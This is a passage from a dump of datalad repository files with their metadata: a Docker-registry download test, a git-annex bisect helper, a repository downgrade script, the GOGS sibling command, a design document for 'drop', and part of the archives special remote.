with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for the docker-registry:// downloader\"\"\"\n\nimport os\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_in,\n eq_,\n integration,\n patch_config,\n skip_if,\n skip_if_no_network,\n slow,\n with_tempfile,\n)\n\n\n@skip_if(os.environ.get(\"TRAVIS_EVENT_TYPE\") != \"cron\" and\n os.environ.get(\"GITHUB_EVENT_NAME\") != \"schedule\",\n \"run restricted cron due to rate limiting\")\n@skip_if_no_network\n@slow # ~7s\n@integration\n@with_tempfile(mkdir=True)\ndef test_download_docker_blob(path=None):\n from datalad.consts import (\n DATALAD_SPECIAL_REMOTE,\n DATALAD_SPECIAL_REMOTES_UUIDS,\n )\n from datalad.customremotes.base import init_datalad_remote\n\n with patch_config({\"datalad.repo.backend\": \"SHA256E\"}):\n ds = Dataset(path).create()\n ds_repo = ds.repo\n init_datalad_remote(ds_repo, DATALAD_SPECIAL_REMOTE)\n\n id_ = \"f0b02e9d092d905d0d87a8455a1ae3e9bb47b4aa3dc125125ca5cd10d6441c9f\"\n outfile = ds_repo.pathobj / \"blob\"\n url = \"https://registry-1.docker.io/v2/library/busybox/blobs/sha256:\" + id_\n ds.download_url(urls=[url], path=str(outfile))\n\n annex_info = ds.repo.get_content_annexinfo(paths=[outfile], init=None)\n eq_(id_, annex_info[outfile][\"keyname\"])\n assert_in(DATALAD_SPECIAL_REMOTES_UUIDS[DATALAD_SPECIAL_REMOTE],\n ds_repo.whereis([str(outfile)])[0])\n" }, { "alpha_fraction": 0.7081544995307922, "alphanum_fraction": 0.716738224029541, "avg_line_length": 31.13793182373047, "blob_id": "493bf49b0f42d89a1d6bb073a4d078fd1546ebf4", "content_id": "3b86c73b775c23fdbcf3e83732197a769ced785a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 932, "license_type": "permissive", "max_line_length": 79, "num_lines": 29, "path": "/tools/bisect-git-annex", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# A helper script that first builds git-annex using a Singularity image before\n# running the bisection command. It should be called from the git-annex source\n# tree as\n#\n# $ git bisect run /path/to/bisect-git-annex IMAGE CMD...\n#\n# where IMAGE is the singularity image or, if an image doesn't exist, the path\n# to which the Singularity image should be downloaded. CMD will be executed if\n# the build completes successfully.\n\nset -eu\nannex_gitver=$(git describe)\nlogfile=$(mktemp -p '' git-annex-build-${annex_gitver}-XXXXXX.log)\n\n[ -e Annex.hs ] # just to make sure that it is invoked in the correct location\necho \"I: cleaning $PWD\"\ngit clean -dfx >/dev/null 2>&1\n\necho \"I: building $annex_gitver\"\nif ! make linuxstandalone 1>\"$logfile\" 2>&1; then\n echo \"E: failed to build, can't test this one. 
See $logfile\"\n exit 125\nfi\nexport PATH=$PWD/tmp/git-annex.linux/:$PATH\n\necho \"I: running the script\"\neval \"$@\"\n" }, { "alpha_fraction": 0.6968325972557068, "alphanum_fraction": 0.7239819169044495, "avg_line_length": 26.625, "blob_id": "3feb637c9bde6366574be3ae3dd59fc4f398b376", "content_id": "06d2cf385ab5aab0b411491ff6b0e72e328c43c7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 221, "license_type": "permissive", "max_line_length": 63, "num_lines": 8, "path": "/pyproject.toml", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "[build-system]\n# wheel to get more lightweight (not EASY-INSTALL) entry-points\nrequires = [\"packaging\", \"setuptools>=40.8.0\", \"wheel\"]\n\n[tool.isort]\nforce_grid_wrap = 2\ninclude_trailing_comma = true\nmulti_line_output = 3\n" }, { "alpha_fraction": 0.7508896589279175, "alphanum_fraction": 0.7508896589279175, "avg_line_length": 30.22222137451172, "blob_id": "9f5d0bfe3fb8a706a56612304000f549b5ba9b28", "content_id": "40ccf11f1ab96420a97ce3d2790ae86416b3dfb6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "permissive", "max_line_length": 82, "num_lines": 9, "path": "/datalad/plugin/export_archive.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.export_archive is deprecated and will be removed in a future \"\n \"release. \"\n \"Use the module from its new location datalad.local.export_archive instead.\",\n DeprecationWarning)\n\nfrom datalad.local.export_archive import *\n" }, { "alpha_fraction": 0.613394558429718, "alphanum_fraction": 0.6162959337234497, "avg_line_length": 34.050846099853516, "blob_id": "9a112673ebd1575d443efc60c237bfde9404b104", "content_id": "ecf07d2311695a860b03fa34087b112d76f4e4c8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4136, "license_type": "permissive", "max_line_length": 87, "num_lines": 118, "path": "/datalad/distributed/create_sibling_gogs.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creating a publication target on a GOGS instance\n\"\"\"\n\nimport logging\nfrom urllib.parse import urlparse\n\nfrom datalad.distributed.create_sibling_ghlike import (\n _create_sibling,\n _GitHubLike,\n)\nfrom datalad.distribution.dataset import datasetmethod\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_gogs')\n\n\nclass _GOGS(_GitHubLike):\n \"\"\"Customizations for the GOGS platform\"\"\"\n name = 'gogs'\n fullname = 'GOGS'\n create_org_repo_endpoint = 'api/v1/org/{organization}/repos'\n create_user_repo_endpoint = 'api/v1/user/repos'\n get_authenticated_user_endpoint = 'api/v1/user'\n get_repo_info_endpoint = 'api/v1/repos/{user}/{repo}'\n extra_remote_settings = {\n # first make sure that annex doesn't touch this one\n # but respect any 
existing config\n 'annex-ignore': 'true',\n }\n\n def __init__(self, url, credential, require_token=True, token_info=None):\n if not url:\n raise ValueError(f'API URL required for {self.fullname}')\n return super().__init__(\n url,\n credential,\n require_token=require_token,\n token_info=f'Visit {url}/user/settings/applications '\n 'to create a token')\n\n\n@build_doc\nclass CreateSiblingGogs(Interface):\n \"\"\"Create a dataset sibling on a GOGS site\n\n GOGS is a self-hosted, free and open source code hosting solution with\n low resource demands that enable running it on inexpensive devices like\n a Raspberry Pi, or even directly on a NAS device.\n\n In order to be able to use this command, a personal access token has to be\n generated on the platform\n (Account->Your Settings->Applications->Generate New Token).\n\n This command can be configured with\n \"datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE\" in\n order to add any local KEY = VALUE configuration to the created sibling in\n the local `.git/config` file. NETLOC is the domain of the Gogs instance to\n apply the configuration for.\n This leads to a behavior that is equivalent to calling datalad's\n ``siblings('configure', ...)``||``siblings configure`` command with the\n respective KEY-VALUE pair after creating the sibling.\n The configuration, like any other, could be set at user- or system level, so\n users do not need to add this configuration to every sibling created with\n the service at NETLOC themselves.\n\n .. versionadded:: 0.16\n \"\"\"\n\n _params_ = _GOGS.create_sibling_params\n _params_['api']._doc = \"\"\"\\\n URL of the GOGS instance without a 'api/<version>' suffix\"\"\"\n\n @staticmethod\n @datasetmethod(name='create_sibling_gogs')\n @eval_results\n def __call__(\n reponame,\n *,\n # possibly retrieve a default from config\n api=None,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name=None,\n existing='error',\n credential=None,\n access_protocol='https',\n publish_depends=None,\n private=False,\n description=None,\n dry_run=False):\n\n yield from _create_sibling(\n platform=_GOGS(api, credential, require_token=not dry_run),\n reponame=reponame,\n dataset=dataset,\n recursive=recursive,\n recursion_limit=recursion_limit,\n name=name,\n existing=existing,\n access_protocol=access_protocol,\n publish_depends=publish_depends,\n private=private,\n description=description,\n dry_run=dry_run,\n )\n" }, { "alpha_fraction": 0.6044830083847046, "alphanum_fraction": 0.6167751550674438, "avg_line_length": 39.661766052246094, "blob_id": "bcfc0d1f055348e1ade92890ad87a21d3bbc2924", "content_id": "ed6d405c47571171c7052253b70b4d3c9da42a1f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2766, "license_type": "permissive", "max_line_length": 112, "num_lines": 68, "path": "/tools/monitor-interrupts.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n\"\"\"\n\n COPYRIGHT: Yaroslav Halchenko 2015\n\n LICENSE: MIT\n\n Permission is hereby granted, free of charge, to any person obtaining a copy\n of this software and associated documentation files (the \"Software\"), to deal\n in the Software without restriction, including without limitation the rights\n to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, 
and to permit persons to whom the Software is\n furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in\n all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n THE SOFTWARE.\n\"\"\"\n\n__author__ = 'Yaroslav Halchenko'\n__copyright__ = 'Copyright (c) 2015 Yaroslav Halchenko'\n__license__ = 'MIT'\n\nimport re, numpy as np, time\n\nreline = re.compile('(?P<int>[^:]*):(?P<counts>[\\s0-9]*)(?P<desc>.*$)')\nfname = '/proc/interrupts'\n\ncounts = None\nwhile True:\n with open(fname) as f:\n old_counts = counts\n lines = f.readlines()\n cpus = lines[0].split()\n names, counts_list, totals = [], [], []\n for l in lines[1:]:\n r = reline.match(l)\n d = r.groupdict()\n c = map(int, d['counts'].split())\n if len(c) != len(cpus):\n totals.append(l)\n else:\n counts_list.append(c)\n names.append((d['int'], d['desc']))\n counts = np.array(counts_list)\n assert(counts.ndim == 2)\n names = np.array(names) # to ease indexing\n if old_counts is not None:\n # do reporting of most active ones\n diff = counts - old_counts\n maxdiff = np.max(diff)\n strformat = \"%%%ds\" % (max(np.log10(maxdiff)+1, 4))\n diff_total = np.sum(diff, axis=1)\n most_active = np.argsort(diff_total)[::-1]\n print \" \"*37 + ' '.join([strformat%c for c in ['TOTAL'] + cpus])\n for name, dt, d in zip(names[most_active], diff_total[most_active], diff[most_active])[:5]:\n print \"%4s %30s: %s %s\" % (name[0], name[1], strformat%dt, ' '.join([strformat % x for x in d]))\n print ''.join(totals)\n time.sleep(1)\n\n" }, { "alpha_fraction": 0.6571747660636902, "alphanum_fraction": 0.6661083102226257, "avg_line_length": 22.552631378173828, "blob_id": "aff18f47aa7059f418563e81779d0e60a039b265", "content_id": "97e1ac616bcf2af11ae3119bb15b1903850654d2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1791, "license_type": "permissive", "max_line_length": 111, "num_lines": 76, "path": "/tools/downgrade-annex", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eu\n\nexport PS4='> '\n# set -x\n\nfunction info () {\n echo \"INFO: $*\"\n}\n\nfunction error() {\n echo \"ERROR: $1\" >&2\n exit \"${2:-1}\"\n}\n\nfunction fsck() {\n info \"FSCKing\"\n git annex fsck --fast -q\n}\n\nfunction check_clean() {\n info \"Checking if all clean\"\n git diff --quiet --exit-code --ignore-submodules && git diff --exit-code --ignore-submodules --cached --quiet\n}\n\n\nif $(git config --global annex.autoupgraderepository) != false; then\n error \"Please disable auto upgrades first\"\nfi\n\ncd \"${1:-.}\"\n\nannex_version=$(git annex version | awk -e '/^git-annex version:/{print $3}')\ncase \"$annex_version\" in\n 5.*|6.*|7.*) info \"git-annex $annex_version . Good, proceeding\";;\n *) error \"git-annex $annex_version . 
Please downgrade to proceed\";;\nesac\n\nrepo_annex_version=$(git config annex.version)\ncase \"$repo_annex_version\" in\n 5) echo \"you are good - already version $repo_annex_version\"; exit 0;;\n 8) ;;\n *) error \"do not know how to downgrade $repo_annex_version, fix me\"\nesac\n\n# needs recent annex\n# unlocked=( $(git annex find --unlocked) )\nunlocked=( $(git grep -l -a --no-textconv --cached '^/annex/objects/' || :) )\nif [ \"${#unlocked[*]}\" -ge 1 ]; then\n error \"Found ${#unlocked[*]} unlocked files. Cannot do: ${unlocked[*]}\" 2\nfi\n\n# Cannot do - needs more recent annex\n# fsck\ncheck_clean\n\ngit config --remove-section filter.annex || echo \"Failed to remove filter.annex, may be gone already\"\nsed -i -n -e '/filter=annex/d' .git/info/attributes\nrm -f .git/hooks/post-checkout .git/hooks/post-merge\nrm -rf .git/annex/keysdb .git/annex/fsck .git/annex/export\n\ngit config annex.version 5\n\nfsck\ncheck_clean\n\n## Let's do a dummy basic operation test\n#echo data > data\n#git annex add data\n#git commit -m 'sample data' data\n#\n#fsck\n#check_clean\n\ninfo \"DONE, all good\"\n\n" }, { "alpha_fraction": 0.6695619225502014, "alphanum_fraction": 0.6956193447113037, "avg_line_length": 34.783782958984375, "blob_id": "a66bcaf6f11c4277012d19091398db09b3a47532", "content_id": "f6f6e2d4606718ac68ee870bb0114eaacb2ebd03", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5391, "license_type": "permissive", "max_line_length": 88, "num_lines": 148, "path": "/docs/source/design/drop.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_drop:\n\n***********************\nDrop dataset components\n***********************\n\n.. topic:: Specification scope and status\n\n This specification is a proposal, subject to review and further discussion.\n It is now partially implemented in the `drop` command.\n\n§1 The :command:`drop` command is the antagonist of :command:`get`. Whatever a\n`drop` can do, should be undoable by a subsequent :command:`get` (given\nunchanged remote availability).\n\n§2 Like :command:`get`, :command:`drop` primarily operates on a mandatory path\nspecification (to discover relevant files and sudatasets to operate on).\n\n§3 :command:`drop` has ``--what`` parameter that serves as an extensible\n\"mode-switch\" to cover all relevant scenarios, like 'drop all file content in\nthe work-tree' (e.g. ``--what files``, default, `#5858\n<https://github.com/datalad/datalad/issues/5858>`__), 'drop all keys from any\nbranch' (i.e. ``--what allkeys``, `#2328\n<https://github.com/datalad/datalad/issues/2328>`__), but also '\"drop\" AKA\nuninstall entire subdataset hierarchies' (e.g. ``--what all``), or drop\npreferred content (``--what preferred-content``, `#3122\n<https://github.com/datalad/datalad/issues/3122>`__).\n\n§4 :command:`drop` prevents data loss by default (`#4750\n<https://github.com/datalad/datalad/issues/4750>`__). Like :command:`get` it\nfeatures a ``--reckless`` \"mode-switch\" to disable some or all potentially slow\nsafety mechanism, i.e. 'key available in sufficient number of other remotes',\n'main or all branches pushed to remote(s)' (`#1142\n<https://github.com/datalad/datalad/issues/1142>`__), 'only check availability\nof keys associated with the worktree, but not other branches'. 
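Under this specification, a hypothetical invocation that combines a mode
switch with a relaxed safety check could look like
``datalad drop --what allkeys --reckless availability <path>`` (an
illustration of the proposed interface only, not a statement about the
current implementation).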
\"Reckless\noperation\" can be automatic, when following a reckless :command:`get` (`#4744\n<https://github.com/datalad/datalad/issues/4744>`__).\n\n§5 :command:`drop` properly manages annex lifetime information, e.g. by announcing\nan annex as ``dead`` on removal of a repository (`#3887\n<https://github.com/datalad/datalad/issues/3887>`__).\n\n§6 Like :command:`get`, drop supports parallelization `#1953\n<https://github.com/datalad/datalad/issues/1953>`__ \n\n§7 `datalad drop` is not intended to be a comprehensive frontend to `git annex\ndrop` (e.g. limited support for e.g. `#1482\n<https://github.com/datalad/datalad/issues/1482>`__ outside standard use cases\nlike `#2328 <https://github.com/datalad/datalad/issues/2328>`__).\n\n.. note::\n It is understood that the current `uninstall` command is largely or\n completely made obsolete by this :command:`drop` concept.\n\n§8 Given the development in `#5842\n<https://github.com/datalad/datalad/issues/5842>`__ towards the complete\nobsolescence of `remove` it becomes necessary to import one of its proposed\nfeatures:\n\n§9 :command:`drop` should be able to recognize a botched attempt to delete a\ndataset with a plain rm -rf, and act on it in a meaningful way, even if it is\njust hinting at chmod + rm -rf.\n\n\nUse cases\n=========\n\nThe following use cases operate in the dataset hierarchy depicted below::\n\n super\n ├── dir\n │ ├── fileD1\n │ └── fileD2\n ├── fileS1\n ├── fileS2\n ├── subA\n │ ├── fileA\n │ ├── subsubC\n │ │ ├── fileC\n │ └── subsubD\n └── subB\n └── fileB\n\nUnless explicitly stated, all command are assumed to be executed in the root of `super`.\n\n- U1: ``datalad drop fileS1``\n\n Drops the file content of `file1` (as currently done by :command:`drop`)\n\n- U2: ``datalad drop dir``\n\n Drop all file content in the directory (``fileD{1,2}``; as currently done by\n :command:`drop`\n\n- U3: ``datalad drop subB``\n\n Drop all file content from the entire `subB` (`fileB`)\n\n- U4: ``datalad drop subB --what all``\n\n Same as above (default ``--what files``), because it is not operating in the\n context of a superdataset (no automatic upward lookups). Possibly hint at\n next usage pattern).\n\n- U5: ``datalad drop -d . subB --what all``\n\n Drop all from the superdataset under this path. I.e. drop all from the\n subdataset and drop the subdataset itself (AKA uninstall)\n\n- U6: ``datalad drop subA --what all``\n\n Error: \"``subA`` contains subdatasets, forgot --recursive?\"\n\n- U7: ``datalad drop -d . subA -r --what all``\n\n Drop all content from the subdataset (``fileA``) and its subdatasets\n (``fileC``), uninstall the subdataset (``subA``) and its subdatasets\n (``subsubC``, ``subsubD``)\n\n- U8: ``datalad drop subA -r --what all``\n\n Same as above, but keep ``subA`` installed\n\n- U9: ``datalad drop sub-A -r``\n\n Drop all content from the subdataset and its subdatasets (``fileA``,\n ``fileC``)\n\n- U10: ``datalad drop . -r --what all``\n\n Drops all file content and subdatasets, but leaves the superdataset\n repository behind\n\n- U11: ``datalad drop -d . subB``\n\n Does nothing and hints at alternative usage, see\n https://github.com/datalad/datalad/issues/5832#issuecomment-889656335\n\n- U12: ``cd .. && datalad drop super/dir``\n\n Like :command:`get`, errors because the execution is not associated with a\n dataset. This avoids complexities, when the given `path`'s point to multiple\n (disjoint) datasets. It is understood that it could be done, but it is\n intentionally not done. 
`datalad -C super drop dir` or `datalad drop -d super\n super/dir` would work.\n" }, { "alpha_fraction": 0.5732051134109497, "alphanum_fraction": 0.5770195126533508, "avg_line_length": 38.70539474487305, "blob_id": "a13504548217b15b4fa13ea42a3d7f809e9b5de1", "content_id": "9a78292c77cfaa69b1452a30a83ec2c261513ff0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19138, "license_type": "permissive", "max_line_length": 123, "num_lines": 482, "path": "/datalad/customremotes/archives.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Custom remote to get the load from archives present under annex\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport os\nimport os.path as op\nimport shutil\nfrom operator import itemgetter\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nfrom annexremote import UnsupportedRequest\n\nfrom datalad.consts import ARCHIVES_SPECIAL_REMOTE\nfrom datalad.customremotes import RemoteError\nfrom datalad.customremotes.main import main as super_main\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.archives import ArchivesCache\nfrom datalad.support.cache import DictCache\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.support.locking import lock_if_check_fails\nfrom datalad.support.network import URL\nfrom datalad.utils import (\n ensure_bytes,\n get_dataset_root,\n getpwd,\n unique,\n unlink,\n)\n\nfrom .base import AnnexCustomRemote\n\nlgr = logging.getLogger('datalad.customremotes.archive')\n\n\n# ####\n# Preserve from previous version\n# TODO: document intention\n# ####\n# this one might get under Runner for better output/control\ndef link_file_load(src, dst, dry_run=False):\n \"\"\"Just a little helper to hardlink files's load\n \"\"\"\n dst_dir = op.dirname(dst)\n if not op.exists(dst_dir):\n os.makedirs(dst_dir)\n if op.lexists(dst):\n lgr.log(9, \"Destination file %(dst)s exists. Removing it first\",\n locals())\n # TODO: how would it interact with git/git-annex\n unlink(dst)\n lgr.log(9, \"Hardlinking %(src)s under %(dst)s\", locals())\n src_realpath = op.realpath(src)\n\n try:\n os.link(src_realpath, dst)\n except (OSError, AttributeError) as e:\n # we need to catch OSError too, because Python's own logic\n # of not providing link() where it is known to be unsupported\n # (e.g. Windows) will not cover scenarios where a particular\n # filesystem simply does not implement it on an otherwise\n # sane platform (e.g. 
exfat on Linux)\n lgr.warning(\"Linking of %s failed (%s), copying file\" % (src, e))\n shutil.copyfile(src_realpath, dst)\n shutil.copystat(src_realpath, dst)\n else:\n lgr.log(2, \"Hardlinking finished\")\n\n\n# TODO: RF functionality not specific to being a custom remote (loop etc)\n# into a separate class\nclass ArchiveAnnexCustomRemote(AnnexCustomRemote):\n \"\"\"Special custom remote allowing to obtain files from archives\n\n Archives must be under annex'ed themselves.\n \"\"\"\n CUSTOM_REMOTE_NAME = \"archive\"\n SUPPORTED_SCHEMES = (\n AnnexCustomRemote._get_custom_scheme(CUSTOM_REMOTE_NAME),)\n # Since we support only 1 scheme here\n URL_SCHEME = SUPPORTED_SCHEMES[0]\n URL_PREFIX = URL_SCHEME + \":\"\n\n COST = 500\n\n def __init__(self, annex, path=None, persistent_cache=True, **kwargs):\n super().__init__(annex)\n\n # MIH figure out what the following is all about\n # in particular path==None\n self.repo = Dataset(get_dataset_root(Path.cwd())).repo \\\n if not path \\\n else AnnexRepo(path, create=False, init=False)\n\n self.path = self.repo.path\n # annex requests load by KEY not but URL which it originally asked\n # about. So for a key we might get back multiple URLs and as a\n # heuristic let's use the most recently asked one\n\n self._last_url = None # for heuristic to choose among multiple URLs\n self._cache = ArchivesCache(self.path, persistent=persistent_cache)\n self._contentlocations = DictCache(size_limit=100) # TODO: config ?\n\n def stop(self, *args):\n \"\"\"Stop communication with annex\"\"\"\n self._cache.clean()\n\n def get_file_url(self, archive_file=None, archive_key=None, file=None,\n size=None):\n \"\"\"Given archive (file or a key) and a file -- compose URL for access\n\n Examples\n --------\n\n dl+archive:SHA256E-s176--69...3e.tar.gz#path=1/d2/2d&size=123\n when size of file within archive was known to be 123\n dl+archive:SHA256E-s176--69...3e.tar.gz#path=1/d2/2d\n when size of file within archive was not provided\n\n Parameters\n ----------\n size: int, optional\n Size of the file. 
If not provided, will simply be empty\n \"\"\"\n assert(file is not None)\n if archive_file is not None:\n if archive_key is not None:\n raise ValueError(\n \"Provide archive_file or archive_key - not both\")\n archive_key = self.repo.get_file_annexinfo(archive_file)['key']\n assert(archive_key is not None)\n attrs = dict() # looking forward for more\n if file:\n attrs['path'] = file.lstrip('/')\n if size is not None:\n attrs['size'] = size\n return str(URL(scheme=self.URL_SCHEME,\n path=archive_key,\n fragment=attrs))\n\n @property\n def cache(self):\n return self._cache\n\n def _parse_url(self, url):\n \"\"\"Parse url and return archive key, file within archive and\n additional attributes (such as size)\"\"\"\n url = URL(url)\n assert(url.scheme == self.URL_SCHEME)\n fdict = url.fragment_dict\n if 'path' not in fdict:\n # must be old-style key/path#size=\n assert '/' in url.path, \"must be of key/path format\"\n key, path = url.path.split('/', 1)\n else:\n key, path = url.path, fdict.pop('path')\n if 'size' in fdict:\n fdict['size'] = int(fdict['size'])\n return key, path, fdict\n\n def _gen_akey_afiles(self, key, sorted=False, unique_akeys=True):\n \"\"\"Given a key, yield akey, afile pairs\n\n if `sorted`, then first those which have extracted version in local\n cache will be yielded\n\n Gets determined based on urls for datalad archives\n\n Made \"generators all the way\" as an exercise but also to delay any\n checks etc until really necessary.\n \"\"\"\n # we will need all URLs anyways later on ATM, so lets list() them\n # Anyways here we have a single scheme (archive) so there is not\n # much optimization possible\n urls = list(self.gen_URLS(key))\n\n akey_afiles = [\n self._parse_url(url)[:2] # skip size\n for url in urls\n ]\n\n if unique_akeys:\n akey_afiles = unique(akey_afiles, key=itemgetter(0))\n\n if not sorted:\n for pair in akey_afiles:\n yield pair\n return\n\n # Otherwise we will go through each one\n\n # multiple URLs are available so we need to figure out which one\n # would be most efficient to \"deal with\"\n akey_afile_paths = (\n ((akey, afile), self.get_contentlocation(\n akey,\n absolute=True, verify_exists=False\n ))\n for akey, afile in akey_afiles\n )\n\n # by default get_contentlocation would return empty result for a key\n # which is not available locally. But we could still have extracted\n # archive in the cache. So we need pretty much get first all possible\n # and then only remove those which aren't present locally. So\n # verify_exists was added\n yielded = set()\n akey_afile_paths_ = []\n\n # utilize cache to check which archives might already be present in the\n # cache\n for akey_afile, akey_path in akey_afile_paths:\n if akey_path and self.cache[akey_path].is_extracted:\n yield akey_afile\n yielded.add(akey_afile)\n akey_afile_paths_.append((akey_afile, akey_path))\n\n # replace generators with already collected ones into a list. 
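        # (Illustrative reminder of what such a pair holds, mirroring the
        # docstring example of get_file_url() above: a URL like
        # 'dl+archive:SHA256E-s176--69...3e.tar.gz#path=1/d2/2d&size=123'
        # parses into akey='SHA256E-s176--69...3e.tar.gz' and afile='1/d2/2d';
        # only the akey part matters for the caching/ordering heuristics here.)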
The idea\n # that in many cases we don't even need to create a full list and that\n # initial single yield would be enough, thus we don't need to check\n # locations etc for every possible hit\n akey_afile_paths = akey_afile_paths_\n\n # if not present in the cache -- check which are present\n # locally and choose that one to use, so it would get extracted\n for akey_afile, akey_path in akey_afile_paths:\n if akey_path and op.exists(akey_path):\n yielded.add(akey_afile)\n yield akey_afile\n\n # So no archive is present either in the cache or originally under\n # annex XXX some kind of a heuristic I guess is to use last_url ;-)\n if self._last_url and self._last_url in urls \\\n and (len(urls) == len(akey_afiles)):\n akey_afile, _ = akey_afile_paths[urls.index(self._last_url)]\n yielded.add(akey_afile)\n yield akey_afile\n\n for akey_afile, _ in akey_afile_paths:\n if akey_afile not in yielded:\n yield akey_afile\n\n def get_contentlocation(self, key, absolute=False, verify_exists=True):\n \"\"\"Return (relative to top or absolute) path to the file containing the key\n\n This is a wrapper around AnnexRepo.get_contentlocation which provides\n caching of the result (we are asking the location for the same archive\n key often)\n \"\"\"\n if key not in self._contentlocations:\n fpath = self.repo.get_contentlocation(key, batch=True)\n if fpath: # shouldn't store empty ones\n self._contentlocations[key] = fpath\n else:\n fpath = self._contentlocations[key]\n # but verify that it exists\n if verify_exists and not op.lexists(op.join(self.path, fpath)):\n # prune from cache\n del self._contentlocations[key]\n fpath = ''\n\n if absolute and fpath:\n return op.join(self.path, fpath)\n else:\n return fpath\n\n # Protocol implementation\n def checkurl(self, url):\n # TODO: what about those MULTI and list to be returned?\n # should we return all filenames or keys within archive?\n # might be way too many?\n # only if just archive portion of url is given or the one pointing\n # to specific file?\n lgr.debug(\"Current directory: %s, url: %s\", os.getcwd(), url)\n akey, afile, attrs = self._parse_url(url)\n size = attrs.get('size', None)\n\n # But reply that present only if archive is present\n # TODO: this would throw exception if not present, so this statement is\n # kinda bogus\n akey_path = self.get_contentlocation(akey, absolute=True)\n if akey_path:\n # Extract via cache only if size is not yet known\n if size is None:\n # if for testing we want to force getting the archive extracted\n efile = self.cache[akey_path].get_extracted_filename(afile)\n efile = ensure_bytes(efile)\n\n if op.exists(efile):\n size = os.stat(efile).st_size\n\n # so it was a good successful one -- record\n self._last_url = url\n\n if size is None:\n return True\n else:\n # FIXME: providing filename causes annex to not even talk to\n # ask upon drop :-/\n return [dict(size=size)] # , basename(afile))\n\n else:\n # TODO: theoretically we should first check if key is available\n # from any remote to know if file is available\n return False\n\n def checkpresent(self, key):\n # TODO: so we need to maintain mapping from urls to keys. 
Then\n # we could even store the filename within archive\n # Otherwise it is unrealistic to even require to recompute key if we\n # knew the backend etc\n # The same content could be available from multiple locations within\n # the same archive, so let's not ask it twice since here we don't care\n # about \"afile\"\n for akey, _ in self._gen_akey_afiles(key, unique_akeys=True):\n if self.get_contentlocation(akey) \\\n or self.repo.is_available(akey, batch=True, key=True):\n return True\n # it is unclear to MIH why this must be UNKNOWN rather than FALSE\n # but this is how I found it\n raise RemoteError('Key not present')\n\n def remove(self, key):\n raise UnsupportedRequest('This special remote cannot remove content')\n # # TODO: proxy query to the underlying tarball under annex that if\n # # tarball was removed (not available at all) -- report success,\n # # otherwise failure (current the only one)\n # akey, afile = self._get_akey_afile(key)\n # if False:\n # # TODO: proxy, checking present of local tarball is not\n # # sufficient\n # # not exists(self.get_key_path(key)):\n # self.send(\"REMOVE-SUCCESS\", akey)\n # else:\n # 